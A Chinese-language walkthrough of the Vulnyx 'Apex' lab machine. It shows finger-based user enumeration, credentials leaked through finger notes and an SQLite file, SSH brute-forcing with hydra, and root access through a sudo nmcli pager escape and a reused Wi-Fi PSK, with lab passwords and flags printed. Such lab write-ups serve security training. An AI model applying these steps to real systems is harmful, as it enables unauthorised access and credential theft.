Vulnyx-APex靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.163  08:00:27:92:cd:a4       (Unknown)
192.168.60.254  00:50:56:f9:b3:de       (Unknown)

15 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.042 seconds (125.37 hosts/sec). 4 responded
❯ export ip=192.168.60.163
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.163:22
Open 192.168.60.163:79
Open 192.168.60.163:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 15:53 CST
Initiating ARP Ping Scan at 15:53
Scanning 192.168.60.163 [1 port]
Completed ARP Ping Scan at 15:53, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:53
Completed Parallel DNS resolution of 1 host. at 15:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:53
Scanning 192.168.60.163 [3 ports]
Discovered open port 79/tcp on 192.168.60.163
Discovered open port 22/tcp on 192.168.60.163
Discovered open port 80/tcp on 192.168.60.163
Completed SYN Stealth Scan at 15:53, 0.09s elapsed (3 total ports)
Nmap scan report for 192.168.60.163
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-22 15:53:39 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
79/tcp open  finger  syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:92:CD:A4 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

浏览器访问80端口

全知之眼？？

用户枚举

扫一下目录，得到一个backup目录，需要Authorization登入

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.163
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 401) [Size: 461]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

同时通过79端口可以发现用户名

79 - Pentesting Finger - HackTricks

❯ nc -vn $ip 79
(UNKNOWN) [192.168.60.163] 79 (finger) open
root
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

或者你可以利用用户枚举工具得到root用户，不知道是为啥端口突然给我关了，是扫太多了吗

重启一下就好了

得到一个personal notes，猜测大概率为用户凭证

❯ ./finger-user-enum.pl -u horus -t $ip
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Wed Jan 22 16:32:48 2025 #########
[email protected]: Login: horus                              Name: ..Directory: /home/horus                  Shell: /bin/bash..Never logged in...Mail forwarded to [email protected] mail...PGP key:..personal notes: H0Ru$$3rv3..No Plan...
######## Scan completed at Wed Jan 22 16:32:48 2025 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

登入后有个db文件

通过file得知是sqlite文件，通过在线网站打开一下

SQL OnLine IDE

得到新的用户凭证

"1"	"anubis"	"L44NxKRnP7wxrBsxibpDORySkbEHRO"
"2"	"amon"	"xqRu08ZA3BihR4lKdJVYcP1x6HjZUf"
"3"	"seth"	"Hm7iYkj2jXDxPUwoW2COs42YjPaC4P"
"4"	"osiris"	"ITA96l3isg4uV2Sm8eYn41XVfxprFy"

将得到的文件处理一下，hydra爆破即可

❯ cat user.txt|awk '{print $2}'|tr -d '"'>users.txt
❯ cat user.txt|awk '{print $3}'|tr -d '"'>pass.txt
❯ hydra -L users.txt -P pass.txt ssh://192.168.60.163
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-22 16:51:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking ssh://192.168.60.163:22/
[22][ssh] host: 192.168.60.163   login: seth   password: xqRu08ZA3BihR4lKdJVYcP1x6HjZUf
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-22 16:51:37

用户提权

得到用户seth和密码xqRu08ZA3BihR4lKdJVYcP1x6HjZUf

❯ ssh seth@$ip
[email protected]'s password:
seth@apex:~$ ls
user.txt
seth@apex:~$ cat user.txt
cb991ca285fc33a6d0ea1cab5f65d3ce

Root提权

再次信息收集

发现拥有sudo权限，你直接打sudo会报错的，sudo在sbin目录下

seth@apex:/tmp$ /usr/sbin/sudo -l
Matching Defaults entries for seth on apex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User seth may run the following commands on apex:
    (root) NOPASSWD: /usr/bin/nmcli

因为用户环境变量中没有添加/usr/sbin/sudo路径

more提权

但是我卡了一会，nmcli咋提权啊，本身就是个管理网络的工具，没有执行命令的

但是发现可能系统会使用more或者less作为分页工具

遂将窗口缩小

seth@apex:/tmp$ /usr/sbin/sudo /usr/bin/nmcli  connection show
NAME         UUID                                  TYPE  DEVICE
MikroTik_AP  e25d230b-bb26-4488-b2e0-1b94dac2b9cd  wifi  --

!/bin/bash

执行命令即可拿到root shell

root@apex:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@apex:/tmp# cat /root/root.txt
c03c45d855d3b683b1637d3b93ead481

预期解

不过这算个作弊方案吧，也不完全按照作者的思路去解

其实正常思路是你既然看到了这个MikroTik_AP 无线网络连接，他就会有配置文件，无线密码总得有吧

不然咋连接

seth@apex:/tmp$ find / -name "MikroTik_AP" 2>/dev/null
/etc/NetworkManager/system-connections/MikroTik_AP

没法正常读，那用mncli来看配置就可以了

不过在此之前，需要查看密码要添加--show-secrets参数

seth@apex:/tmp$ /usr/sbin/sudo nmcli connection show MikroTik_AP --show-secrets
connection.id:                          MikroTik_AP
connection.uuid:                        e25d230b-bb26-4488-b2e0-1b94dac2b9cd
connection.stable-id:                   --
connection.type:                        802-11-wireless
connection.interface-name:              --
connection.autoconnect:                 sí
connection.autoconnect-priority:        0
connection.autoconnect-retries:         -1 (default)
connection.multi-connect:               0 (default)
connection.auth-retries:                -1
connection.timestamp:                   0
connection.read-only:                   no
connection.permissions:                 --
connection.zone:                        --
connection.master:                      --
connection.slave-type:                  --
connection.autoconnect-slaves:          -1 (default)
connection.secondaries:                 --
connection.gateway-ping-timeout:        0
connection.metered:                     desconocido
connection.lldp:                        default
connection.mdns:                        -1 (default)
connection.llmnr:                       -1 (default)
connection.wait-device-timeout:         -1
802-11-wireless.ssid:                   MikroTik_AP
802-11-wireless.mode:                   infrastructure
802-11-wireless.band:                   --
802-11-wireless.channel:                0
802-11-wireless.bssid:                  --
802-11-wireless.rate:                   0
802-11-wireless.tx-power:               0
802-11-wireless.mac-address:            --
802-11-wireless.cloned-mac-address:     --
802-11-wireless.generate-mac-address-mask:--
802-11-wireless.mac-address-blacklist:  --
802-11-wireless.mac-address-randomization:default
802-11-wireless.mtu:                    auto
802-11-wireless.seen-bssids:            --
802-11-wireless.hidden:                 no
802-11-wireless.powersave:              0 (default)
802-11-wireless.wake-on-wlan:           0x1 (default)
802-11-wireless.ap-isolation:           -1 (default)
802-11-wireless-security.key-mgmt:      wpa-psk
802-11-wireless-security.wep-tx-keyidx: 0
802-11-wireless-security.auth-alg:      --
802-11-wireless-security.proto:         --
802-11-wireless-security.pairwise:      --
802-11-wireless-security.group:         --
802-11-wireless-security.pmf:           0 (default)
802-11-wireless-security.leap-username: --
802-11-wireless-security.wep-key0:      --
802-11-wireless-security.wep-key1:      --
802-11-wireless-security.wep-key2:      --
802-11-wireless-security.wep-key3:      --
802-11-wireless-security.wep-key-flags: 0 (ninguno)
802-11-wireless-security.wep-key-type:  unknown
802-11-wireless-security.psk:           WIFI_p@$$w0rd_is_$up3r_$3cur3
802-11-wireless-security.psk-flags:     0 (ninguno)
802-11-wireless-security.leap-password: --
802-11-wireless-security.leap-password-flags:0 (ninguno)
802-11-wireless-security.wps-method:    0x0 (default)
802-11-wireless-security.fils:          0 (default)
ipv4.method:                            auto
ipv4.dns:                               --
ipv4.dns-search:                        --
ipv4.dns-options:                       --
ipv4.dns-priority:                      0
ipv4.addresses:                         --
ipv4.gateway:                           --
ipv4.routes:                            --
ipv4.route-metric:                      -1
ipv4.route-table:                       0 (unspec)
ipv4.routing-rules:                     --
ipv4.ignore-auto-routes:                no
ipv4.ignore-auto-dns:                   no
ipv4.dhcp-client-id:                    --
ipv4.dhcp-iaid:                         --
ipv4.dhcp-timeout:                      0 (default)
ipv4.dhcp-send-hostname:                sí
ipv4.dhcp-hostname:                     --
ipv4.dhcp-fqdn:                         --
ipv4.dhcp-hostname-flags:               0x0 (none)
ipv4.never-default:                     no
ipv4.may-fail:                          sí
ipv4.dad-timeout:                       -1 (default)
ipv4.dhcp-vendor-class-identifier:      --
ipv4.dhcp-reject-servers:               --
ipv6.method:                            auto
ipv6.dns:                               --
ipv6.dns-search:                        --
ipv6.dns-options:                       --
ipv6.dns-priority:                      0
ipv6.addresses:                         --
ipv6.gateway:                           --
ipv6.routes:                            --
ipv6.route-metric:                      -1
ipv6.route-table:                       0 (unspec)
ipv6.routing-rules:                     --
ipv6.ignore-auto-routes:                no
ipv6.ignore-auto-dns:                   no
ipv6.never-default:                     no
ipv6.may-fail:                          sí
ipv6.ip6-privacy:                       -1 (unknown)
ipv6.addr-gen-mode:                     stable-privacy
ipv6.ra-timeout:                        0 (default)
ipv6.dhcp-duid:                         --
ipv6.dhcp-iaid:                         --
ipv6.dhcp-timeout:                      0 (default)
ipv6.dhcp-send-hostname:                sí
ipv6.dhcp-hostname:                     --
ipv6.dhcp-hostname-flags:               0x0 (none)
ipv6.token:                             --
proxy.method:                           none
proxy.browser-only:                     no
proxy.pac-url:                          --
proxy.pac-script:                       --

拿到密码WIFI_p@$$w0rd_is_$up3r_$3cur3

切换root即可

seth@apex:/tmp$ su root
Contraseña:
root@apex:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)